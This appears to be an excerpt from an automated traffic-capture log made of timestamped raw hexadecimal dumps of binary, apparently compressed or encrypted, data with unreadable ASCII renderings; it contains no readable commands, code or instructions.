                                                                                                    2023-10-24 04:55:22 UTC3192INData Raw: 25 8f 82 58 fb b5 53 fd 65 3f 77 25 26 03 d4 ca 9e 7f f6 4f 99 ff 8c b5 bf 57 08 cd c4 ac d9 55 05 ab 52 f5 55 26 11 2b 45 37 c3 7f 74 05 1e 6a 1f 1b f9 8f 5d ae 93 aa 87 ab 3a 27 bb 2a 6f ff 8c c9 ff b7 09 3c 1f 37 fe de dd f4 a6 4e 6c 2b d6 60 f9 87 ed 7f 6d d4 ed d5 38 f0 55 27 ff 5f 1b 43 4d e4 38 17 78 df 85 8c 79 dc 7f c8 ad 60 c5 fb bf 3c d8 1e 26 e3 24 1a f7 47 77 18 a6 4e 4f f9 78 a5 89 3f 7f 55 37 97 82 e9 4e 93 0b 5d 94 13 9a c9 da 51 ed 22 dd 0b 64 76 53 63 c8 f3 1f b2 e4 d7 b2 2e 05 b9 f0 ef d9 7e 86 a2 9b c6 bf f9 33 8e 73 c1 c4 92 bf 2b f0 ff db 9e eb d7 fe a0 e7 df 3c e8 a2 a2 7c 90 8a e3 fa 34 5f ed 9a 3b aa f1 f2 d7 f4 19 59 c0 39 ec 37 ca ff d3 92 f9 f3 a0 87 da 53 e7 cf 9c ed d5 bd bc 26 1b 0d c0 42 ed 3b 7f d5 78 4d 75 59 a8 6e 2b fe
                                                                                                    Data Ascii: %XSe?w%&OWURU&+E7tj]:'*o<7Nl+`m8U'_CM8xy`<&$GwNOx?U7N]Q"dvSc.~3s+<|4_;Y97S&B;xMuYn+
                                                                                                    2023-10-24 04:55:22 UTC3199INData Raw: bd 0f da fa 65 6a 29 bf ec a4 11 f7 48 cc 41 23 b3 6e 5d 10 2b d9 99 36 53 37 59 68 39 14 c1 39 9a 60 8a 67 31 57 36 5e 64 4e c4 5a d9 a0 0f 72 2a d7 2a 5a 55 30 01 28 d1 90 8e 92 32 d8 57 9a 73 ea e7 66 60 fa 4e 81 86 1b 23 ef be cd 7c 9b 98 b9 53 9e 4b 81 75 51 fd 9c e3 a5 97 db 6a 89 c5 d3 12 3f 94 bb 1b 61 11 8f 11 eb a4 15 32 23 d9 b2 f5 5a 76 b5 6a bc 6e 75 bd 2c 9b e5 21 d7 2f 16 65 64 57 45 27 b5 e1 0f 59 fb fd b4 d3 e3 d3 3d 55 f3 89 37 6a 68 1e a8 0f 0a a9 9b 0c dc b3 8a 9d 2d 22 ad 9a 53 c6 1f a2 8f 4f 3b 15 73 b2 10 74 61 c0 27 8a 7e 76 ed 26 bd dc 6b df 06 3c 22 4e 79 8b 70 1c ac e4 29 9d d8 da 88 ac 0b 29 b6 80 19 ba 6f 2b 6a 6d ed d2 fb 4f 40 7d cb 60 17 d3 78 99 fc 20 07 82 39 5c 70 9e f9 c0 1b d1 de b6 4e cf 35 1b 1d b9 11 f9 e4 08 ac b8
                                                                                                    Data Ascii: ej)HA#n]+6S7Yh99`g1W6^dNZr**ZU0(2Wsf`N#|SKuQj?a2#Zvjnu,!/edWE'Y=U7jh-"SO;sta'~v&k<"Nyp))o+jmO@}`x 9\pN5
                                                                                                    2023-10-24 04:55:22 UTC3207INData Raw: b5 c5 f9 99 19 2c 25 b1 c6 dd ea 29 71 05 da 58 fe 26 ed 04 14 c7 a2 5b 22 61 2e 11 f6 2d ae c8 e2 aa b0 3b 98 70 25 52 bd 26 7f 28 a5 9d 8f be 36 14 0a 07 e5 f3 2a bd 89 14 5f 5d 1f 97 dd 15 da fe 6e f5 07 7c fc bd 3d 87 e7 cb 31 97 85 9d ed 35 45 79 e3 5e 53 bb 55 25 34 43 f7 31 93 e4 f8 f8 3c ea c3 8e 20 1d 71 be 69 f7 6b 6d be 04 5f e7 04 cb 9f ad 8d aa d1 11 4d 72 39 9d 57 da 9a f6 79 b9 74 f6 2a 73 54 db 03 91 52 7f 32 6f b0 bd c2 55 eb 6d 0b ef 74 3a d6 47 42 61 af 27 e2 0a 06 7b 0c ed 5b e5 29 dd 11 b1 f3 9d 89 c5 62 3e 1f 97 bf 64 85 ab 22 92 d8 b9 d3 87 87 dc 54 e9 6e 6a 0f b5 36 07 36 6f a8 a6 23 0e 2a b6 d5 c5 63 2e 7b a4 d7 c8 b6 92 d6 3a 67 22 da 96 f2 d8 6a 63 51 6f d8 cb f7 bc 57 49 eb 86 36 87 3b ae e9 ba bc c1 e5 fa db 7a 0c 9d 57 e5 a9
                                                                                                    Data Ascii: ,%)qX&["a.-;p%R&(6*_]n|=15Ey^SU%4C1< qikm_Mr9Wyt*sTR2oUmt:GBa'{[)b>d"Tnj66o#*c.{:g"jcQoWI6;zW
                                                                                                    2023-10-24 04:55:22 UTC3215INData Raw: a1 47 ee bf 99 fc 30 73 06 bb 6c c7 89 f8 cd 1f 26 d1 81 57 7e 8d 6e 5c 5b 41 de bf c4 c5 b6 5e 88 f1 be 87 f7 d3 4f 76 cc 47 7f 5b fe 03 99 7b cc 3b ec b3 ef 3a f0 15 37 1f 40 ff 31 bc 12 75 0c ed 46 76 c7 66 b2 49 6b aa 70 69 cd 99 f4 f9 a5 47 a0 a7 ef 1f 47 2e a6 db 58 c3 99 4b f1 a0 d7 6c 74 d9 7d 37 a3 83 0f 4d 91 af 2e 7a 96 85 e6 9e 89 7f 6e 1f 4a 77 dd 7e 18 7a a8 fb 7c e2 3f bb 94 b5 be d5 88 ff f5 f7 2b e8 1b db 1e 41 a3 ee fc 8d 0c f0 2f 61 2b ef fb 11 6f 9f 32 80 56 bd b0 1d cd b9 fa 26 f2 e3 09 45 ac f8 a4 be f8 bc 41 b7 50 e7 fa 0d 68 f8 96 a1 64 f3 cf ef b1 95 27 0d c3 7d 0e 2b a3 4d 5f 1f 81 ce 7e fc 27 32 ee a2 fb 58 db 9d bb 71 1f 4f 01 7d b3 e9 38 34 fd ad 3a f2 43 59 80 bd fc ee 87 b8 f0 fd a9 b4 aa 7c 01 2a ae fc 90 34 7d b0 9b 1d ff
                                                                                                    Data Ascii: G0sl&W~n\[A^OvG[{;:7@1uFvfIkpiGG.XKlt}7M.znJw~z|?+A/a+o2V&EAPhd'}+M_~'2XqO}84:CY|*4}
                                                                                                    2023-10-24 04:55:22 UTC3223INData Raw: ec 49 c7 f6 1f 15 78 ee 7c 1d d8 18 38 82 da a6 df 97 98 3e 6b 30 a2 ba d9 43 bf 9e 6c 76 3f 4f 1a d7 58 24 07 97 bb e1 8e 76 5a 7c b5 f7 21 f8 38 66 2a ed 3d 16 2a 8b 62 6d d1 69 62 2d 1f 9f a2 04 c7 47 f5 a2 39 55 3d a4 2c ea 25 6a 1f 56 e6 75 35 e3 21 6d d7 2d 9a db 72 8a 8c 58 d9 01 2d 17 39 f3 64 eb 4e 50 5c fb 8e 2e 6c f0 17 b5 e7 41 f8 7a 72 39 27 f4 3b 05 8b af 9c a4 f0 a1 a3 65 cf 2e 0b 5c 35 2f 95 bf de ff 03 71 0a 61 f4 3d 5d 5f ca 07 9d c5 43 81 cb f8 5a cf 38 88 ed 32 89 7a ab 3f 95 8f 56 2b 70 d2 bc 9f bc 49 6f 3f 34 1a 14 d3 c0 e3 28 21 89 49 38 62 4a 6f 1e eb f1 0a 1e 56 bc a5 5e ca bf 64 55 78 03 06 ff 19 c4 25 65 d3 c1 47 bb 1f dd 4d ef 29 87 a7 7d c7 76 6f ac b9 eb 85 a9 f0 74 56 1f fa a9 6b 2a f5 df c2 71 47 c1 02 0e 58 75 17 36 67 7a
                                                                                                    Data Ascii: Ix|8>k0Clv?OX$vZ|!8f*=*bmib-G9U=,%jVu5!m-rX-9dNP\.lAzr9';e.\5/qa=]_CZ82z?V+pIo?4(!I8bJoV^dUx%eGM)}votVk*qGXu6gz
                                                                                                    2023-10-24 04:55:22 UTC3231INData Raw: 68 fb f3 12 59 52 f2 13 23 f7 b6 61 dd d7 3d e1 dc c8 b9 a4 5c d7 5f 8c 9e 55 e3 81 c9 27 f9 53 cf 48 58 fb ca 9d 86 6b ec 90 da a9 87 b0 dd dc 0a 4e fe 11 09 9e 0a dd e8 49 31 c9 d9 89 9f 71 6d f6 56 d6 d4 7e 0c 3b ac 2f 52 fb 91 b3 24 3d 55 0f 7f 2f ae 66 eb 9c 3a d8 bb 67 04 45 ed 59 25 0d 03 2d f1 fe 90 d5 bc 30 16 a0 3e 72 33 bd b6 3d 2c 7b f6 e5 a3 77 ca 69 5e 9e 50 04 eb 73 37 d0 83 b8 85 72 be 65 01 ae 74 6f c5 f6 0b 95 60 42 76 13 bd 6e e3 28 5f f4 53 f0 b5 75 3e 77 55 d2 04 13 a7 3d d4 b2 10 65 6e ea 55 6c d0 9a ca 7f e7 f8 c1 ef a9 7d 68 6f fd 00 c9 be d8 05 23 3a 18 72 bf 3a 55 b8 9f d5 8e 3c 9c ee 4b 7d 4d 04 1a d4 34 70 e3 bd 63 50 51 60 43 f6 75 ff c9 ea 53 65 18 c7 9e 5c b6 64 1a bc 9b 7b 9c ec ef 5a 4a 87 dd 33 d1 71 f2 3b 4e d0 6f 01 29
                                                                                                    Data Ascii: hYR#a=\_U'SHXkNI1qmV~;/R$=U/f:gEY%-0>r3=,{wi^Ps7reto`Bvn(_Su>wU=enUl}ho#:r:U<K}M4pcPQ`CuSe\d{ZJ3q;No)
                                                                                                    2023-10-24 04:55:22 UTC3238INData Raw: e6 ee db f9 f7 c9 67 30 a8 7c 1a 65 6b 9c 91 6a 9d 38 74 be 59 cb 6b 6d 3f 40 7a 8d 2e 69 bf 98 21 61 65 4e 38 e9 d8 49 fe b3 e8 1a 9c f8 f6 91 2c e6 38 cb cc 89 83 70 c7 a0 29 dc e1 f8 47 50 99 ba 83 2e 5c da 2a 5d ab 9e 62 a4 86 0b 67 b4 4d 86 59 97 f6 51 89 d7 7c 29 4e d9 89 21 e1 6d 78 74 d5 2e 08 72 ee 4d f1 67 17 c9 95 9c 41 38 41 21 94 dd 8e 8c 84 3d 2a b1 74 ef 46 a0 3c df a4 89 79 79 3e bc b5 30 0f fc aa 17 52 b5 69 81 ac a3 29 78 b0 56 97 c3 9e 39 c3 a2 e3 33 69 d0 9b b7 b2 d9 4f 01 63 9d 90 23 7e 1f 02 71 1c 4a ba aa 49 b2 c6 f9 3c fe 8d 89 e1 dd 5b e3 61 62 d4 20 0a 34 2a 17 e5 31 8d f8 46 79 06 77 58 91 09 1b a2 b7 91 82 db 7e 39 4b 29 68 5b b1 82 75 7a 65 40 e3 b6 73 b4 e9 54 96 f8 cc fc 84 4d 23 6a f9 78 2f 13 f0 ed 61 43 b7 0e aa c8 c9 4c
                                                                                                    Data Ascii: g0|ekj8tYkm?@z.i!aeN8I,8p)GP.\*]bgMYQ|)N!mxt.rMgA8A!=*tF<yy>0Ri)xV93iOc#~qJI<[ab 4*1FywX~9K)h[uze@sTM#jx/aCL
                                                                                                    2023-10-24 04:55:22 UTC3246INData Raw: 92 ff a5 25 d2 7a c2 72 34 e0 ad 7c 49 fc 61 a1 e2 2d ca 47 75 19 34 ee 2e 8e fd fb 95 af ee 28 83 4e ef 6c e9 90 45 b5 9c 59 71 0d cb 26 2b 33 c4 2d 85 36 e2 4c 36 ff 2d 92 e8 07 ab 71 50 4c 33 fb 2b 2f 81 e9 2e 4c e1 ed 4c 64 a7 e9 66 8c 3f a9 c1 47 ee 7e 81 5e 87 52 28 ad 53 4f 19 71 48 09 5d e2 06 f0 e2 5b f9 30 63 78 10 6d 52 fd 2b f3 55 26 21 66 1d 61 98 b6 07 bc a6 84 92 51 ff 0f 72 e2 4d 0f 1c db c6 8f 2b e7 27 c3 43 bb 20 1a 67 58 22 f8 62 2d 46 d4 29 f3 9a 73 a7 a1 b3 f2 58 72 09 ee 25 93 a2 3e e1 b4 37 3f d8 e3 d5 0a 88 d0 e8 4f 63 9f 8d 95 65 0b 11 4b 9a ab d9 4a b5 0c 0c 21 91 16 47 8d 93 9f 7d 3b 60 3c 76 e3 66 cd 61 b0 a9 bc 3b cd 6a 17 2a e1 c5 b7 f0 f9 e4 6f 9c 38 7f 06 d8 6a ad 25 f3 69 e5 a2 f2 70 1d 86 06 e7 f3 60 0d 45 88 53 72 a0 b9
                                                                                                    Data Ascii: %zr4|Ia-Gu4.(NlEYq&+3-6L6-qPL3+/.LLdf?G~^R(SOqH][0cxmR+U&!faQrM+'C gX"b-F)sXr%>7?OceKJ!G};`<vfa;j*o8j%ip`ESr
                                                                                                    2023-10-24 04:55:22 UTC3254INData Raw: 21 ff 9d fe 19 2e 57 0c a7 ba 8e aa e2 76 2a 13 cd b5 8d 39 fa ed 3e 88 cf 59 46 17 f6 1d 97 7d 3a 5f 30 6f df 64 36 33 e8 0f 9d cb 2f 91 74 fc 26 af 7e 9a 61 e8 c0 87 fc a3 cc 0d 06 5f e9 42 89 87 32 e5 6f e7 77 38 c5 73 3a c7 37 2e 81 2f b1 f6 e4 b8 7f 93 1c 78 f3 00 a7 dd 8f 63 f5 75 0b c0 d6 a0 94 ca bb ff 90 59 99 c3 f1 49 bf d1 2c cb 3e c0 f9 44 67 aa ff 30 4f a6 9d ac 44 3c 34 8b 03 8a 8d e0 6c 40 16 fd d5 a8 11 da ff 1c 37 f4 ea cc 2b ef b6 03 33 cb 58 0a 5c 13 29 e3 74 f4 b0 7c dc 49 2e ab 1d 00 3b c2 4f 52 55 f4 08 f1 b7 6a c6 fa 0b 67 79 9f de 04 70 ae 54 a3 be 71 9d 45 ef bd 11 fa 5f ac e0 6f 77 a7 83 49 fe 1c 2a 71 09 97 de d3 3a 61 43 bf a5 bc f0 3f 3f f0 3c d9 9d 7e 70 8e a8 2b f7 c4 c7 5b a2 f8 8e ef 6e 10 b7 7b 64 14 f5 56 44 b3 04 3d 2e
                                                                                                    Data Ascii: !.Wv*9>YF}:_0od63/t&~a_B2ow8s:7./xcuYI,>Dg0OD<4l@7+3X\)t|I.;ORUjgypTqE_owI*q:aC??<~p+[n{dVD=.
                                                                                                    2023-10-24 04:55:22 UTC3262INData Raw: 48 f9 2b 67 bc 8f 07 ab 1d 40 13 ae 5b 49 b1 9d 0a 7e 8b 38 c8 63 bb 3a c0 f1 4f 31 f4 fd ef 23 e9 1e a5 8e 16 0d ff 5a 77 f7 11 28 79 aa 42 32 5a 4d 16 3a 64 e2 91 b4 df 3c bc b5 3b 98 cf bb 40 d7 5d 9c 25 75 f0 31 54 79 5f c2 fe eb 0d 81 c7 cd a3 07 37 27 8b 4c 6d 87 4f 7f 6d 62 19 f9 1a ee 06 b5 a3 6d 2d ec a5 67 8b 4c dc ed fb 94 1b 5d fd 20 eb fc 71 ea 62 f1 4c 8e 7d 79 8c ff bd 55 e2 4a 73 03 d0 35 b1 24 87 ed 33 a4 42 e9 25 76 0c 36 e4 45 6f 63 c0 f0 e9 7c 5a e3 1f 22 6d 5c 66 60 e5 49 7b be 85 00 b5 2f 42 c9 2e 37 5b 36 cc bb 87 93 77 85 73 dc b4 7d 50 30 c8 82 ec 3a 6b 48 ae 43 67 f4 7b 98 c0 7e 9b 86 42 ac e7 0f 6a c0 64 49 f9 af 23 2a 86 0e e7 33 1b 52 e1 c9 3a a2 49 71 a5 b2 56 5b 15 63 0f ed e1 17 2d b2 61 d4 92 0c 32 9c 3e 46 5a c7 1e c3 07
                                                                                                    Data Ascii: H+g@[I~8c:O1#Zw(yB2ZM:d<;@]%u1Ty_7'LmOmbm-gL] qbL}yUJs5$3B%v6Eoc|Z"m\f`I{/B.7[6ws}P0:kHCg{~BjdI#*3R:IqV[c-a2>FZ
                                                                                                    2023-10-24 04:55:22 UTC3270INData Raw: 97 4a b4 4b 0e 2e 0e df cb af 6e ef 00 a3 69 c1 b4 74 8f 89 68 3f dc 85 43 e6 0d e2 07 81 7d 40 8e 5c a5 ee fd 56 49 1f c5 75 b8 d4 b2 98 37 35 c6 c0 cb 64 75 8a 5b ba 41 b4 fd 1e a3 d5 99 17 9c 74 f9 2d fc 30 3b 43 0f 37 1e 13 cb e0 7f 7b 60 a8 ce dd 8e 4f 04 9d 4e 5b a9 c4 fe b6 f4 45 37 c4 9d f1 dc d4 45 17 82 9e 0f a2 95 0e e6 f2 bc 69 1d f6 8b 5b cb dd 5c d3 60 ae b9 1e d5 4c ac 93 82 d6 2b f1 b5 ff 3e 5e 7c c0 17 52 b1 94 fa 7f 7d 26 ab fb b8 e3 c8 f0 89 5c ba 58 01 be cf f2 a7 b8 19 8d 62 d9 aa 06 9b c2 4c f9 59 9d 3f 8c d5 df 4b 91 de e3 c4 7a af 22 aa 6a 87 72 cd 60 5b f8 d4 7a 28 e9 45 7e 97 17 67 3d d0 e1 ae 22 bf 3c 18 03 83 d7 7e a5 9c ce 1d a4 7a d2 05 2c 37 cb e1 4f 1a 35 a0 e1 7d 88 96 9c d8 28 1f 4f ac c7 4a cd 26 3e f1 68 34 4c 0c 2f a2
                                                                                                    Data Ascii: JK.nith?C}@\VIu75du[At-0;C7{`ON[E7Ei[\`L+>^|R}&\XbLY?Kz"jr`[z(E~g="<~z,7O5}(OJ&>h4L/
                                                                                                    2023-10-24 04:55:22 UTC3277INData Raw: 28 bf 09 7b 5c fb ff e9 3e af 61 f2 b9 a7 f4 f2 4d 5b e9 b8 37 02 c7 1c 9b cd d7 13 a6 42 fd a0 07 34 c8 c6 4e 3a c2 07 b4 e8 eb c1 0b 2f 02 8c 7f ae 4c e7 ab 2b e5 59 eb 60 b4 5d 75 8e 87 25 f6 86 41 f5 bb e9 a1 ca 46 99 6f 30 04 87 fd 1a c0 97 d3 0f 82 cb bd d3 a4 b3 7d 82 64 e7 14 62 74 e0 02 0e 5e e9 0e a9 77 de 90 ea 99 06 29 98 55 8a bf de 17 f3 11 dd 4e 50 e7 9d 48 10 79 56 e6 9e 30 c3 8d a6 9e 6c e8 34 09 0e 9d f8 43 d9 7b d7 89 46 c7 4c ec b1 e8 32 d7 cb 75 a8 f5 b9 4b ff 5d 9d 29 71 45 6b b0 5d a7 a1 1c 7f bf 12 dc 5f 7d a1 2c d7 54 e9 d0 ba 07 9e a7 39 7c f7 d2 29 90 47 06 e4 da 21 5a d4 fd 36 60 7d c7 9e 6c 73 30 0f 7e 1b 5d a7 37 db 87 c8 67 aa 47 ef c8 85 dc ef cf 6d 70 6c b3 9b 66 ed 1c 2f 75 f3 dd d1 ae 53 1b b6 98 3e 19 92 d3 dc a8 77 c0
                                                                                                    Data Ascii: ({\>aM[7B4N:/L+Y`]u%AFo0}dbt^w)UNPHyV0l4C{FL2uK])qEk]_},T9|)G!Z6`}ls0~]7gGmplf/uS>w
                                                                                                    2023-10-24 04:55:22 UTC3285INData Raw: 3d db 44 d1 9a 6c 83 45 5b e6 f0 be ba 15 50 a7 e1 4d 66 57 5a c9 c7 69 5d f1 ef 94 5c 6e bf db 1f 52 ff f6 a3 8b dd 43 a5 53 11 e2 da e5 53 19 1e ad 07 f5 49 61 34 87 1f c9 e9 12 25 fc 75 fe 35 9b ee aa 83 59 87 d7 d0 82 b2 5e 92 da 98 8a 23 3a 46 b3 6b 90 25 ec 8e 7d 41 39 a7 6c 64 b5 ce 2f 54 ac 2d e4 5b 5e 16 d0 57 cb 93 ae 18 da 48 a8 dd 27 6c 5c 67 cc 6d e6 94 c3 ce 82 5d 34 4b 37 59 0c 0b 5a e3 8c 2b c2 fe 47 86 43 3b bf b5 e4 d3 f7 9c 38 1c df 8d 73 bf ac e6 f8 47 2e 30 b0 ae 3b f5 b8 f0 4f 62 ab 35 50 a3 6d 28 1b df b8 0c 2e b6 3b c9 9e 3f cb b4 fa 7d d8 ea 40 3b 7e ac e4 0b da a3 e3 a8 f2 54 67 49 8f 51 41 59 a7 c9 41 11 b9 d0 a3 dd 33 0a 32 33 96 32 a5 18 ac 3d ee c8 df c2 fb c1 f5 c0 f5 54 61 3c 50 3e f6 df 88 a5 89 67 38 61 e6 1c 38 b9 6f 00
                                                                                                    Data Ascii: =DlE[PMfWZi]\nRCSSIa4%u5Y^#:Fk%}A9ld/T-[^WH'l\gm]4K7YZ+GC;8sG.0;Ob5Pm(.;?}@;~TgIQAYA3232=Ta<P>g8a8o
                                                                                                    2023-10-24 04:55:22 UTC3293INData Raw: ab 7e c9 a2 81 0a 68 5b 5a ca 63 e2 2c 00 17 3c a3 8b 89 4b e4 83 e3 66 4c 4f 55 e3 88 75 86 30 c7 b5 25 69 97 e6 c9 e5 76 d7 31 92 02 b9 eb dd a9 50 14 f4 85 e6 c9 7d 69 74 58 83 3e 8a 1d 78 ef e3 cd 30 f1 fb 67 6a 78 e6 28 b3 7e ba a1 1b 74 e4 85 1e 8b 61 41 f5 4b 3a 65 64 25 cf 12 76 e1 ce cc ad bc af fc 3f 48 9c 52 48 2d d6 e9 4a 72 e1 09 3c f7 26 90 0f 26 9e 87 b8 f4 18 b2 d8 ac 29 26 fe 4a 98 a9 95 c9 ca bb c7 40 76 8b 29 64 e4 ff 57 ce 7f d7 c7 e7 a6 05 ec d9 e5 1a 98 bc 7e 4c fb 9e 35 ca 99 fa 3f 38 bd f7 5c ae df da 1e 6e fe 0d fe e7 75 bf a4 a8 87 23 5a 9d 3b c6 79 d1 3d a1 95 5e 12 1d e8 d2 28 1d 9a 0e e3 82 4f b7 f9 94 5f 3f 78 19 3a 85 16 37 97 ca ad 5b 09 98 a6 69 c8 ef 0b c6 80 f1 91 6d 14 3c ae bf 24 4d 3f 8e d3 1c 56 32 86 d8 c2 a1 21 e6
                                                                                                    Data Ascii: ~h[Zc,<KfLOUu0%iv1P}itX>x0gjx(~taAK:ed%v?HRH-Jr<&&)&J@v)dW~L5?8\nu#Z;y=^(O_?x:7[im<$M?V2!
                                                                                                    2023-10-24 04:55:22 UTC3301INData Raw: ee 2e 5d c7 76 c1 d4 a0 2f 3c 2f 7f 3c 7c ab b1 20 0b f3 00 51 2f ef 83 f6 7a 83 d8 e2 89 35 bc ba b4 96 5a 98 38 48 53 17 5b cc df f7 9a 77 6f 4e 06 c3 7e 17 e9 d2 7f 31 12 17 d9 13 67 6c a9 e4 8b 4e 9e b0 ff 58 35 6d b9 b3 5a 3e de 5d 8f f5 17 d7 b0 c3 ab f6 50 7b cf 81 ec 0b 4c 44 c3 7c 3d 6a 95 8c e2 5f f1 3f 61 de f2 6f 74 b1 7d ae 64 7a ae 40 3f bb dd 3c ac f3 13 58 ef fc 80 2a d5 f4 24 60 65 27 ac dd e2 cb 17 2f 7f 85 16 9a da 34 1c e6 ca ca e0 73 78 c8 af 03 bf 3d 2d 70 50 63 3c cd cf 9f 27 a3 fa 67 e3 9e 96 53 79 7f e1 3b b0 d5 69 47 df fd 2f 89 83 d3 73 dc 9f 78 9b 97 54 c6 43 9f b9 a5 b4 bc c5 26 a9 ae fe c7 28 87 c3 3c 75 74 2e 88 cb 4c 4a b8 12 2f f6 a9 b9 38 c7 9f b9 08 c6 c2 fe 96 95 94 3c d5 59 86 ab 3d c3 3e 51 6a 3c 42 6b 08 18 2c 7f 46
                                                                                                    Data Ascii: .]v/</<| Q/z5Z8HS[woN~1glNX5mZ>]P{LD|=j_?aot}dz@?<X*$`e'/4sx=-pPc<'gSy;iG/sxTC&(<ut.LJ/8<Y=>Qj<Bk,F
                                                                                                    2023-10-24 04:55:22 UTC3309INData Raw: 5a 75 24 57 bc fb df c6 98 f7 c0 aa 6f 0b 20 6e d4 3b 0a 5c e7 2f 8e d1 29 98 b7 3d 80 a7 a5 4f 82 f3 aa 2a d4 86 be 89 6b 7e 15 fe f9 12 c4 11 fb fa 41 44 f2 04 b2 93 22 39 73 72 33 fa 9d 1b c4 27 4a f7 c0 8b cb f6 b4 c1 46 4d 8e 3d b8 8a bf ce fc e6 9c 61 1b e0 72 e2 42 32 1e 74 5a d2 17 e9 a3 57 82 3a ef 50 1b 06 87 fa ba 51 a5 17 cb e4 91 57 ff 71 58 3e ff 88 c9 06 ff d3 41 34 db e2 3f 39 74 6c 3b 16 45 1e 64 73 cf 0c d0 50 23 6a 77 fd 9d 04 9c ee 8e 6a 1e 87 d9 d8 36 05 ec 53 0f d2 f6 dd 59 b2 ec 78 24 26 e6 56 f2 db 5f 35 d0 3d e9 00 5d 6c df 4b 06 55 e6 e1 ed 1b bf f8 ec dc d7 70 65 40 04 35 dd 31 93 e2 ab 5d b0 34 63 1b 77 8d dd 01 fb bc e2 c8 71 60 9d 78 07 1c 47 eb 67 bb f8 4c 98 29 b8 1d 28 a6 b0 89 0a e2 73 71 3b 8e d8 78 90 3d 54 1b c0 35 76
                                                                                                    Data Ascii: Zu$Wo n;\/)=O*k~AD"9sr3'JFM=arB2tZW:PQWqX>A4?9tl;EdsP#jwj6SYx$&V_5=]lKUpe@51]4cwq`xGgL)(sq;x=T5v
                                                                                                    2023-10-24 04:55:22 UTC3317INData Raw: 27 d1 69 54 35 27 bf ba 0f fa de 57 e9 c1 9e 73 32 53 6d 08 d2 e3 27 7c c4 7e 22 7c b9 dc 9d 2a 7e 19 cb 0d af 8f 38 b0 64 27 27 4f 1c 0b f7 dd 4e d0 f2 30 77 59 70 78 03 2a 8e ed c0 73 cd c7 c3 a2 ca 8e a4 e4 a4 28 ff 69 58 e1 c1 be aa fc 66 8e 27 f8 76 2e a4 4f 57 ee cb db 5b d6 a8 b3 62 1c 3f da 15 0c 2d e3 34 a9 85 dd 35 39 7e a4 1e 47 2c 28 e2 c7 db 06 41 41 9a 21 9d 26 45 a9 69 13 89 8d ef 7e f2 64 8f 7f 4c 5d 63 40 5b 1f f7 95 3f 9a f6 f8 f5 88 02 87 8d 27 78 f2 fc 35 39 af 3c 2b 3a 7d 67 e2 aa 19 7b 78 ff da db f0 61 ab 21 85 f4 68 2f aa 1f 27 e2 ce 76 8b f9 60 67 7d 38 1d f4 8d 5a c5 8c 92 0b 85 16 e8 e0 3e 92 5b 58 fe 81 82 81 af 68 75 ea 57 29 35 08 c4 bd 77 d6 f0 34 b5 77 f0 46 f3 21 dd 68 65 29 56 3d ac 50 37 cd 97 15 3b 7c 83 7c 33 33 9a d3
                                                                                                    Data Ascii: 'iT5'Ws2Sm'|~"|*~8d''ON0wYpx*s(iXf'v.OW[b?-459~G,(AA!&Ei~dL]c@[?'x59<+:}g{xa!h/'v`g}8Z>[XhuW)5w4wF!he)V=P7;||33
                                                                                                    2023-10-24 04:55:22 UTC3324INData Raw: 23 96 92 4a db 7c 09 2a 7e 88 21 85 2e bc c0 c6 0d 2c 94 b6 90 fd 1a 15 69 4c 3a 8f 17 0c 56 72 ba e5 60 38 71 7a 29 f5 7b 70 4e 5e 1e 58 84 5a d7 6e f1 9f 16 a3 21 f0 c7 7a fa 6c 1b f4 6f 9f bf c3 d1 25 dd f8 f3 da 34 78 6b dd 89 5c 36 6b 4a ff 9c af 78 a2 bb 16 3f d2 1e 04 be 1e af c9 e1 cb 58 c9 53 ed 8c 6f 3a 78 f2 c3 9e 8a 60 bd 79 36 b9 df 5e 2d 0f 23 8c 31 71 eb 4b 5e 32 c0 19 12 93 72 a9 ed 92 68 49 9e 38 0e f7 4d 3f c6 37 c7 6a 41 ab 93 e6 34 ff 4f a5 f4 0b ff 0f bf 3f 6f e6 bc ce be 90 a5 78 87 22 e7 8c 96 ae 09 6a b8 6a 9c 09 ff ea 58 05 f5 7f 7e d1 91 b7 2b 65 e1 21 c2 9f be 85 5c fb 34 0c d6 db 8c 24 eb bb 81 52 7d a6 01 03 8a 7e b1 c9 d6 c5 90 fb 51 8f ba 1f af 94 3d df 8c 31 61 ef 37 ae ef 53 0d 66 4d a7 68 42 51 94 64 e5 d4 a1 f1 8a 4e 3c
                                                                                                    Data Ascii: #J|*~!.,iL:Vr`8qz){pN^XZn!zlo%4xk\6kJx?XSo:x`y6^-#1qK^2rhI8M?7jA4O?ox"jjX~+e!\4$R}~Q=1a7SfMhBQdN<
                                                                                                    2023-10-24 04:55:22 UTC3332INData Raw: 50 c3 9a 57 e2 60 9a 87 5d e2 97 f2 d7 b0 71 d0 93 a2 29 af a9 a3 58 19 b7 40 9d 1e af d8 d9 d7 19 fc 0e 85 d0 da 88 2d 72 cc 39 12 37 7a 3c e0 2f cd 07 00 de 24 d2 98 48 0b d9 36 31 14 0b 5c 87 f2 41 87 11 10 52 39 97 2c 3e eb c8 f5 9b 2f 71 77 79 0f 6e 6b fe 11 8a 46 4e a7 a6 19 7e b2 d9 5e 1b 07 fe 32 e2 4b 6d 0f 82 a9 92 32 3d 3f 16 27 5a af fa e0 b2 cc 64 36 e9 e9 03 bd f6 fc 24 bf 8d 79 a2 3d b7 0a 93 26 a4 f3 b1 d7 21 a0 f3 e4 24 5d 1b 3f 5d 2e ba a7 e2 e6 78 23 8e 75 8a 81 45 2d 8c c9 ef f6 22 d9 58 e4 83 e6 0b 4b f9 f8 a4 79 d0 4a 33 91 2c d7 ef 94 a9 da a9 a8 b9 f6 04 f7 b8 39 05 96 cb 3a 5a 7d 3c 40 3c 4e 38 a1 e7 ab f9 bc e5 f5 24 78 97 dc 96 a6 37 f6 92 f7 e7 9f a1 c1 85 64 36 ce 2d 85 b7 df df ff bb 6f f6 32 fe 77 2e 6e 7c 90 c8 b9 51 e7 61
                                                                                                    Data Ascii: PW`]q)X@-r97z</$H61\AR9,>/qwynkFN~^2Km2=?'Zd6$y=&!$]?].x#uE-"XKyJ3,9:Z}<@<N8$x7d6-o2w.n|Qa
